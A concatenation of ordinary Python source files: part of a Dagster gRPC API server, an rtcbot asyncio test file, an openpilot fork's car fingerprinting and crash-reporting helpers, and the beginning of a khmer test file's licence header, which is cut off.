self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalNotebookData(self, request, _context):
notebook_path = request.notebook_path
check.str_param(notebook_path, "notebook_path")
return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_data = serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_data)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
)
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def _split_serialized_data_into_chunk_events(self, serialized_data):
num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_data),
)
yield api_pb2.StreamingChunkEvent(
sequence_number=i,
serialized_chunk=serialized_data[start_index:end_index],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_schedule_data = serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_sensor_data = serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
args.cursor,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except:
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except:
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except:
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(namedtuple("GrpcServerLoadErrorEvent", "error_info")):
def __new__(cls, error_info):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(
ThreadPoolExecutor(max_workers=max_workers),
compression=grpc.Compression.Gzip,
options=[
("grpc.max_send_message_length", max_send_bytes()),
("grpc.max_receive_message_length", max_rx_bytes()),
],
)
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
start_time = time.time()
last_error = None
while True:
try:
client.ping("")
return
except grpc._channel._InactiveRpcError: # pylint: disable=protected-access
last_error = serializable_error_info_from_exc_info(sys.exc_info())
if time.time() - start_time > timeout:
raise Exception(
f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
)
if server_process.poll() != None:
raise Exception(
f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
)
sleep(0.1)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ ["--lazy-load-user-code"]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
+ (["--log-level", "WARNING"]) # don't log INFO messages for automatically spun up servers
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
from dagster.grpc.client import DagsterGrpcClient
client = DagsterGrpcClient(
port=port,
socket=socket,
host="localhost",
)
try:
wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
self.port = None
self.socket = None
self.server_process = None
self.loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.int_param(startup_timeout, "startup_timeout")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
|
test_base.py
|
import asyncio
import aiounittest
import threading
import time
from rtcbot.base import (
SubscriptionConsumer,
SubscriptionProducer,
ThreadedSubscriptionConsumer,
ThreadedSubscriptionProducer,
)
class TestBaseClasses(aiounittest.AsyncTestCase):
async def test_SubscriptionConsumer(self):
c = SubscriptionConsumer(asyncio.Queue)
c.put_nowait("test")
self.assertEqual(await c.get(), "test")
q = asyncio.Queue()
q.put_nowait("yay")
c.putSubscription(q)
self.assertEqual(await c.get(), "yay")
# Now test cancellation - the current subscription is q.
# we will switch to the default one
getTask = asyncio.create_task(c.get())
# Give time for the task to start
await asyncio.sleep(0.01)
c.put_nowait("Hi!")
await getTask
self.assertEqual(getTask.result(), "Hi!")
c.put_nowait("Yo!")
c.close()
async def test_SubscriptionProducer(self):
p = SubscriptionProducer(asyncio.Queue, defaultAutosubscribe=True)
# Nothing subscribed
p.put_nowait("1")
# DefaultAutosubscribe subscribes default during creation
self.assertEqual(await p.get(), "1")
q1 = p.subscribe()
q2 = p.subscribe()
p.put_nowait("2")
self.assertEqual(await p.get(), "2")
self.assertEqual(await q1.get(), "2")
self.assertEqual(await q2.get(), "2")
# Unsubscribe should stop it receiving updates
p.unsubscribe(q2)
p.put_nowait("3")
q2.put_nowait(12)
self.assertEqual(await p.get(), "3")
self.assertEqual(await q1.get(), "3")
self.assertEqual(await q2.get(), 12)
p.unsubscribe()
p.put_nowait("4")
# The default is recreated here
getTask = asyncio.create_task(p.get())
# Give time for the task to start
await asyncio.sleep(0.01)
p.put_nowait("5")
await getTask
self.assertEqual(getTask.result(), "5")
self.assertEqual(await q1.get(), "4")
self.assertEqual(await q1.get(), "5")
p.unsubscribeAll()
p.put_nowait("6")
q1.put_nowait(8)
self.assertEqual(await q1.get(), 8)
p.unsubscribe()
p.unsubscribe()
p.close()
class TestThreadedClasses(aiounittest.AsyncTestCase):
async def test_ThreadedConsumer(self):
c = ThreadedSubscriptionConsumer()
c.put_nowait("test")
await c.onReady()
self.assertEqual(c.ready, True)
# Have to sleep to give asyncio time to prepare the data
await asyncio.sleep(0.1)
self.assertEqual(c.testQueue.get(), "test")
# Now we test switching between subscriptions
q = asyncio.Queue()
q.put_nowait("heyy")
c.putSubscription(q)
await asyncio.sleep(0.01)
self.assertEqual(c.testQueue.get(), "heyy")
# Switch bask to the default
c.put_nowait("yeehaw")
await asyncio.sleep(0.01)
self.assertEqual(c.testQueue.get(), "yeehaw")
# wait 10 seconds to make sure the no incoming data line of code runs #codeCoverage
await asyncio.sleep(10)
c.close()
await asyncio.sleep(0.01)
self.assertEqual(c.ready, False)
self.assertEqual(c.testQueue.get(), "<<END>>")
async def test_ThreadedProducer(self):
p = ThreadedSubscriptionProducer()
await p.onReady()
self.assertEqual(p.ready, True)
p.testQueue.put("test1")
self.assertEqual(await p.get(), "test1")
def pushsleep():
# Work around the lask of a timeout in testing p
time.sleep(0.1)
p.testQueue.put("Ending")
threading.Thread(target=pushsleep).run()
p.close()
await asyncio.sleep(0.01)
self.assertEqual(p.ready, False)
self.assertEqual(p.testResultQueue.get(), "<<END>>")
|
car_helpers.py
|
import os
import threading
import json
import requests
from common.params import Params
from common.basedir import BASEDIR
from selfdrive.car.fingerprints import eliminate_incompatible_cars, all_known_cars
from selfdrive.car.vin import get_vin, VIN_UNKNOWN
from selfdrive.car.fw_versions import get_fw_versions, match_fw_to_car
from selfdrive.swaglog import cloudlog
import cereal.messaging as messaging
import selfdrive.crash as crash
from selfdrive.car import gen_empty_fingerprint
from common.travis_checker import travis
from common.op_params import opParams
op_params = opParams()
use_car_caching = op_params.get('use_car_caching', True)
from cereal import car
def get_startup_alert(car_recognized, controller_available):
alert = 'startup'
if Params().get("GitRemote", encoding="utf8") in ['git@github.com:arne182/openpilot.git', 'https://github.com/arne182/openpilot.git']:
if Params().get("GitBranch", encoding="utf8") not in ['release2', 'release3', 'release4', 'release5', 'release6']:
alert = 'startupMaster'
if not car_recognized:
alert = 'startupNoCar'
elif car_recognized and not controller_available:
alert = 'startupNoControl'
return alert
def load_interfaces(brand_names):
ret = {}
for brand_name in brand_names:
path = ('selfdrive.car.%s' % brand_name)
CarInterface = __import__(path + '.interface', fromlist=['CarInterface']).CarInterface
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carstate.py'):
CarState = __import__(path + '.carstate', fromlist=['CarState']).CarState
else:
CarState = None
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carcontroller.py'):
CarController = __import__(path + '.carcontroller', fromlist=['CarController']).CarController
else:
CarController = None
for model_name in brand_names[brand_name]:
ret[model_name] = (CarInterface, CarController, CarState)
return ret
def _get_interface_names():
# read all the folders in selfdrive/car and return a dict where:
# - keys are all the car names that which we have an interface for
# - values are lists of spefic car models for a given car
brand_names = {}
for car_folder in [x[0] for x in os.walk(BASEDIR + '/selfdrive/car')]:
try:
brand_name = car_folder.split('/')[-1]
model_names = __import__('selfdrive.car.%s.values' % brand_name, fromlist=['CAR']).CAR
model_names = [getattr(model_names, c) for c in model_names.__dict__.keys() if not c.startswith("__")]
brand_names[brand_name] = model_names
except (ImportError, IOError):
pass
return brand_names
# imports from directory selfdrive/car/<name>/
interface_names = _get_interface_names()
interfaces = load_interfaces(interface_names)
def only_toyota_left(candidate_cars):
return all(("TOYOTA" in c or "LEXUS" in c) for c in candidate_cars) and len(candidate_cars) > 0
# **** for use live only ****
def fingerprint(logcan, sendcan, has_relay):
params = Params()
car_params = params.get("CarParams")
if not travis:
cached_fingerprint = params.get('CachedFingerprint')
else:
cached_fingerprint = None
if car_params is not None:
car_params = car.CarParams.from_bytes(car_params)
if has_relay:
# Vin query only reliably works thorugh OBDII
bus = 1
cached_params = Params().get("CarParamsCache")
if cached_params is not None:
cached_params = car.CarParams.from_bytes(cached_params)
if cached_params.carName == "mock":
cached_params = None
if cached_params is not None and len(cached_params.carFw) > 0 and cached_params.carVin is not VIN_UNKNOWN:
cloudlog.warning("Using cached CarParams")
vin = cached_params.carVin
car_fw = list(cached_params.carFw)
else:
cloudlog.warning("Getting VIN & FW versions")
_, vin = get_vin(logcan, sendcan, bus)
car_fw = get_fw_versions(logcan, sendcan, bus)
fw_candidates = match_fw_to_car(car_fw)
else:
vin = VIN_UNKNOWN
fw_candidates, car_fw = set(), []
cloudlog.warning("VIN %s", vin)
Params().put("CarVin", vin)
finger = gen_empty_fingerprint()
candidate_cars = {i: all_known_cars() for i in [0, 1]} # attempt fingerprint on both bus 0 and 1
frame = 0
frame_fingerprint = 10 # 0.1s
car_fingerprint = None
done = False
if cached_fingerprint is not None and use_car_caching: # if we previously identified a car and fingerprint and user hasn't disabled caching
cached_fingerprint = json.loads(cached_fingerprint)
if cached_fingerprint[0] is None or len(cached_fingerprint) < 3:
params.delete('CachedFingerprint')
else:
finger[0] = {int(key): value for key, value in cached_fingerprint[2].items()}
source = car.CarParams.FingerprintSource.can
return (str(cached_fingerprint[0]), finger, vin, car_fw, cached_fingerprint[1])
while not done:
a = messaging.get_one_can(logcan)
for can in a.can:
# need to independently try to fingerprint both bus 0 and 1 to work
# for the combo black_panda and honda_bosch. Ignore extended messages
# and VIN query response.
# Include bus 2 for toyotas to disambiguate cars using camera messages
# (ideally should be done for all cars but we can't for Honda Bosch)
if can.src in range(0, 4):
finger[can.src][can.address] = len(can.dat)
for b in candidate_cars:
if (can.src == b or (only_toyota_left(candidate_cars[b]) and can.src == 2)) and \
can.address < 0x800 and can.address not in [0x7df, 0x7e0, 0x7e8]:
candidate_cars[b] = eliminate_incompatible_cars(can, candidate_cars[b])
# if we only have one car choice and the time since we got our first
# message has elapsed, exit
for b in candidate_cars:
# Toyota needs higher time to fingerprint, since DSU does not broadcast immediately
if only_toyota_left(candidate_cars[b]):
frame_fingerprint = 100 # 1s
if len(candidate_cars[b]) == 1:
if frame > frame_fingerprint:
# fingerprint done
car_fingerprint = candidate_cars[b][0]
elif len(candidate_cars[b]) < 4: # For the RAV4 2019 and Corolla 2020 LE Fingerprint problem
if frame > 180:
if any(("TOYOTA COROLLA TSS2 2019" in c) for c in candidate_cars[b]):
car_fingerprint = "TOYOTA COROLLA TSS2 2019"
# bail if no cars left or we've been waiting for more than 2s
failed = all(len(cc) == 0 for cc in candidate_cars.values()) or frame > 200
succeeded = car_fingerprint is not None
done = failed or succeeded
frame += 1
source = car.CarParams.FingerprintSource.can
# If FW query returns exactly 1 candidate, use it
if len(fw_candidates) == 1:
car_fingerprint = list(fw_candidates)[0]
source = car.CarParams.FingerprintSource.fw
fixed_fingerprint = os.environ.get('FINGERPRINT', "")
if len(fixed_fingerprint):
car_fingerprint = fixed_fingerprint
source = car.CarParams.FingerprintSource.fixed
cloudlog.warning("fingerprinted %s", car_fingerprint)
params.put("CachedFingerprint", json.dumps([car_fingerprint, source, {int(key): value for key, value in finger[0].items()}]))
return car_fingerprint, finger, vin, car_fw, source
def is_connected_to_internet(timeout=5):
try:
requests.get("https://sentry.io", timeout=timeout)
return True
except:
return False
def crash_log(candidate):
while True:
if is_connected_to_internet():
crash.capture_warning("fingerprinted %s" % candidate)
break
def crash_log2(fingerprints, fw):
while True:
if is_connected_to_internet():
crash.capture_warning("car doesn't match any fingerprints: %s" % fingerprints)
crash.capture_warning("car doesn't match any fw: %s" % fw)
break
def get_car(logcan, sendcan, has_relay=False):
candidate, fingerprints, vin, car_fw, source = fingerprint(logcan, sendcan, has_relay)
if candidate is None:
if not travis:
y = threading.Thread(target=crash_log2, args=(fingerprints,car_fw,))
y.start()
cloudlog.warning("car doesn't match any fingerprints: %r", fingerprints)
candidate = "mock"
if not travis:
x = threading.Thread(target=crash_log, args=(candidate,))
x.start()
CarInterface, CarController, CarState = interfaces[candidate]
car_params = CarInterface.get_params(candidate, fingerprints, has_relay, car_fw)
car_params.carVin = vin
car_params.carFw = car_fw
car_params.fingerprintSource = source
return CarInterface(car_params, CarController, CarState), car_params
|
test_read_parsers.py
|
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2013-2015, Michigan State University.
# Copyright (C) 2015-2016, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
